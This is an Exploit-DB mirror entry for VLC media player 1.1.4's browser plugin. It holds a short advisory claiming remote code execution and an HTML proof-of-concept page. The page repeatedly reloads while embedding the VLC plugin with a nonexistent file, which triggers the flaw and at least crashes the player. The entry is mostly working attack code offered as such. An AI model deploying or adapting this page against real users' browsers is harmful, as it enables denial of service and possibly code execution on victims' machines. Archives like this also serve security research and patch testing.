exploit-db-mirror/exploits/windows/remote/34870.html
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

13 lines
No EOL
532 B
HTML

source: http://www.securityfocus.com/bid/44211/info
VLC media player is prone to a remote code-execution vulnerability.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
VLC media player 1.1.4 is vulnerable; other versions may also be affected.
<html>
<body onload="setTimeout('location.reload()', 100);">
<embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
</body>
</html>